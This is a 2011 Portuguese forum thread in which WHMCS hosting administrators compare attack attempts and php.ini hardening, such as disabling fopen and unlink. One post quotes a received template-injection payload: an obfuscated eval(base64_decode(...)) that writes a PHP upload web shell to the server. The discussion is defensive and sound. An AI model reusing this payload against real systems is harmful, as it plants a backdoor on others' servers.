Agencia Moderna Postado Dezembro 9, 2011 Compartilhar Postado Dezembro 9, 2011 Reversível não, porque esse tem o base64_encode e base64_decode. Os outros são md5, sha1 e crypt (acho que é isso) mas eles não podem ser revertidos, por isso não podem ser usados para esse fim. Desabilitei a fopen para que não possam abrir arquivos e a unlink para que não removam o arquivo php.ini ou os .htaccess. Link para o comentário Compartilhar em outros sites More sharing options...
Cristian Augusto Postado Dezembro 9, 2011 Compartilhar Postado Dezembro 9, 2011 Este php.ini que você fala, deve ser criado dentro da pasta do whmcs, certo? Link para o comentário Compartilhar em outros sites More sharing options...
Agencia Moderna Postado Dezembro 9, 2011 Compartilhar Postado Dezembro 9, 2011 Sim, e se der algum problema com o ionCube, você coloca em /home/usuario/php.ini (ja deve existir aqui). Link para o comentário Compartilhar em outros sites More sharing options...
Cristian Augusto Postado Dezembro 9, 2011 Compartilhar Postado Dezembro 9, 2011 Sim, e se der algum problema com o ionCube, você coloca em /home/usuario/php.ini (ja deve existir aqui). Certo. Obrigado! Link para o comentário Compartilhar em outros sites More sharing options...
Alexandre Duran Postado Dezembro 9, 2011 Compartilhar Postado Dezembro 9, 2011 Reversível não, porque esse tem o base64_encode e base64_decode. Os outros são md5, sha1 e crypt (acho que é isso) mas eles não podem ser revertidos, por isso não podem ser usados para esse fim. Desabilitei a fopen para que não possam abrir arquivos e a unlink para que não removam o arquivo php.ini ou os .htaccess. O FOPEN aqui é desabilitado a muito tempo em todos os servidores. O unlink é uma boa ideia implementar, não afeta em nada os demais scripts. Vou testar aqui. Link para o comentário Compartilhar em outros sites More sharing options...
Cassiano Teixeira Postado Dezembro 9, 2011 Compartilhar Postado Dezembro 9, 2011 Recebi uma tentativa hoje mais cedo também: {php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJqMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltMTFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZMmh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDBpWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFhCc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzTkNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5ZG1hV3hsSjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dleUJsWTJodklDYzhZajVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p5UGljN0lIME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzYjJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5JK1BHSnlQaWM3SUgwTkNuME5DajgrIik7DQokZm8gPSBmb3BlbigidGVtcGxhdGVzX2MvcmVkLnBocCIsInciKTsNCmZ3cml0ZSgkZm8sJGNvZGUpOw=='));{/php}) De imediato, informei ao suporte WHMCS.. Fui respondido com a seguinte resposta: Hi Cassiano, The patch we released last week was designed to protect this so providing you have applied that there is no need for concern: http://forum.whmcs.com/showthread.php?t=43462 If you can, please post this on the forum thread you refer to if nobody else has already because unfortunately we can't understand the language posted there, but there is no risk from these attempts if you have applied the patch we released over a week ago for it. Regards, Matt ------- Forums: http://forums.whmcs.com/ Documentation: http://docs.whmcs.com/ ---------------------------------------------- Ticket ID: #512446 Mais eu tinha atualizado no mesmo dia que saiu essa atualização.. Assim como muitos amigos aqui também ja tenham atualizado, mesmo assim teve essa tentativa.. Inclusive informei a eles o link deste tópico, ressaltando que muitos usuários estavam sofrendo o mesmo ataque.. Link para o comentário Compartilhar em outros sites More sharing options...
Agencia Moderna Postado Dezembro 9, 2011 Compartilhar Postado Dezembro 9, 2011 Pois é... seria bom todos aqui desabilitarem as funções que citei anteriormente... Quem sabe isso para! Link para o comentário Compartilhar em outros sites More sharing options...
Marco Antonio Postado Dezembro 9, 2011 Compartilhar Postado Dezembro 9, 2011 Recebi uma tentativa hoje mais cedo também: De imediato, informei ao suporte WHMCS.. Fui respondido com a seguinte resposta: Mais eu tinha atualizado no mesmo dia que saiu essa atualização.. Assim como muitos amigos aqui também ja tenham atualizado, mesmo assim teve essa tentativa.. Inclusive informei a eles o link deste tópico, ressaltando que muitos usuários estavam sofrendo o mesmo ataque.. No caso o que a WHMCS diz é: Se vc já atualizou o seu WHMCS com o pack de segurança, desconsidere, pois é so uma tentativa, mais como ja fez a correção, e so ignorar Link para o comentário Compartilhar em outros sites More sharing options...
Cassiano Teixeira Postado Dezembro 9, 2011 Compartilhar Postado Dezembro 9, 2011 Tentei desabilitar no subdomínio WHMCS que utilizo deu erro.. Link para o comentário Compartilhar em outros sites More sharing options...
Cassiano Teixeira Postado Dezembro 9, 2011 Compartilhar Postado Dezembro 9, 2011 No caso o que a WHMCS diz é: Se vc já atualizou o seu WHMCS com o pack de segurança, desconsidere, pois é so uma tentativa, mais como ja fez a correção, e so ignorar Mais este tipo de ataques não faz efeito..?? (no meu caso estou atualizado) Link para o comentário Compartilhar em outros sites More sharing options...
Posts Recomendados